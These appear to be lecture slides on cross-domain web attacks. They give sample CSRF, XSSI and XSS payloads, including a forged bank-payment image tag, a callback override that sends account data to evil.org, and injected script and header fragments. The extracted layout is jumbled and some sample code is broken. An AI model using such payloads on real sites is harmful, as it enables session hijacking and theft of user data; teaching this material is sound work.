Cross-Domain Security in Web Applications: Hapter
Cross-Domain Security in Web Applications: Hapter
Cross-Domain Security in
Web Applications
Outline
• Cross Domain Interaction
• Attack Methods
– Cross-Site Request Forgery (XSRF)
– Cross-Site Script Inclusion (XSSI)
– Cross-Site Scripting (XSS)
• Prevention
– Preventing XSRF
– Preventing XSSI
– Preventing XSS
Cross Domain Interaction
• The Interaction
– Domain: where our apps & services are hosted
– Cross-domain: security threats due to interactions
between our applications and pages on other domains
– Ex: Alice is simultaneously (i.e. same browser session),
using our (“good”) web-application and a “malicious” web-
application
• Security issues
– Browser interacting with multiple web apps
– Could be normal or malicious interactions
– Not direct attacks
Interaction Between Web Pages From
Different Domains
• Possible interactions limited by same-origin policy
(a.k.a. cross-domain security policy)
– Links, embedded frames, data inclusion across domains
still possible
– Client-side scripts can make requests cross-domain
/auth uname=victim&pass=fmd9032
Cookie: sessionid=40a4c04de
/viewbalance
Cookie: sessionid=40a4c04de
/auth uname=victim&pass=fmd9032
Cookie: sessionid=40a4c04de
/evil.html
<img src="http://bank.com/paybill?
addr=123 evil st & amt=$10000">
/paybill?addr=123 evil st, amt=$10000
Cookie: sessionid=40a4c04de
“OK. Payment Sent!”
Outline
• Cross Domain Interaction
• Attack Methods
– Cross-Site Request Forgery (XSRF)
– Cross-Site Script Inclusion (XSSI)
– Cross-Site Scripting (XSS)
• Prevention
– Preventing XSRF
– Preventing XSSI
– Preventing XSS
Cross-Site Script Inclusion (XSSI)
• 3rd-party can include <script> sourced from us
• Static Script Inclusion
– Purpose is to enable code sharing, i.e. providing JavaScript
library for others to use
– Including 3rd-party script dangerous w/o control since it
runs in our context with full access to client data
• Dynamic Script
– Instead of traditional postback of new HTML doc,
asynchronous requests (AJAX) used to fetch data
– Malicious site performs data exchanged via XML or JSON
(arrays, dicts) with target server by the user browser
XSSI Procedure
• Malicious website can request dynamic script
• Browser authentication cookies would be sent
• Script (JSON fragment) returned by server is
accessible to and runs on the malicious site
• But, script is evaluated in hacker’s context
• Hacker redefines the callback method to process and
harvest the user data as desired
XSSI Example
Request http://www.mywwwservice.com/json/
nav_data?callback_UpdateHeader
Client Server
JavaScript Code Snippet Reply
UpdateHeader({
Typical "date_time": "2007/07/19 6:22", sends back
Interaction "logged_in_user": "alice", user data!
"account_balance": "256.98"
}) Attack Scenario
<script>
function UpdateHeader(dict) { Malicious site loads script to
if (dict['account_balance'] > 100) { initiate the request instead
do_phishing_redirect(
dict['logged_in_user']); }
Browser sends cookies
} // do evil stuff, get user data Server replies as usual
</script>
<script Evil Script gets user data!
src="http://www.mywwwservice.com/json/nav_data?callback=UpdateHeader">
</script>
XSSI Example: AJAX Script
• Dynamic Script Inclusion: viewbalance.html
• Good Site: www.bank.com
<script>
x = new XMLHTTPRequest(); // used to make an AJAX request
x.onreadystatechange = ProcessResults;
x.open("POST",
"http://www.bank.com/json/get_data?callback=RenderData");
function ProcessResults() {
if (x.readyState == 4 and x.status = 200)
eval(x.responseBody);
}
</script>
Normal AJAX Interaction
Alice bank.com
login & authenticate
Cookie: sessionid=40a4c04de
/viewbalance.html
Cookie: sessionid=40a4c04de
/json/get_data?callback=RenderData
RenderData({“acct_no”:”494783”, “balance”:”10000”})
RenderData
Another XSSI Attack
Alice bank.com evil.org
login & authenticate
Cookie: sessionid=40a4c04de
/viewbalance.html Cookie: sessionid=40a4c04de
/evil.html
<script>
function RenderData(args) { sendArgsToEvilOrg(args); }
</script>
<script src="http://www.bank.com/json/get_data?
callback=RenderData">
RenderData({“acct_no”:”494783”, “balance”:”10000”})
Overrides
RenderData({“acct_no”:”494783”, “balance”:”10000”}) Callback!
Outline
• Cross Domain Interaction
• Attack Methods
– Cross-Site Request Forgery (XSRF)
– Cross-Site Script Inclusion (XSSI)
– Cross-Site Scripting (XSS)
• Prevention
– Preventing XSRF
– Preventing XSSI
– Preventing XSS
Cross-Site Scripting (XSS)
• What if attacker can get a malicious script to be
executed in our application’s context?
• access user’s cookies, transfer to their server
• Ex: our app could have a query parameter in a search
URL and print it out on page
– http://www.mywwwservice.com/query?question=cookies
– Following fragment in returned HTML document with
value of parameter question inserted into page
...<p>Your query for 'cookies' returned the following results:<p>...
<html>
<head><title>Moved</title></head>
<body>Moved <a href='%(redir_url)s'>here</a></body>
</html>
<script>evil()</script><html><head><title>Moved</title>
</head><body>
Moved <a href='oops:foo
Set-Cookie: SESSION=13af..3b; domain=mywwwservice.com
<script>evil()</script>'>here</a></body></html>
– Or through tag:
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">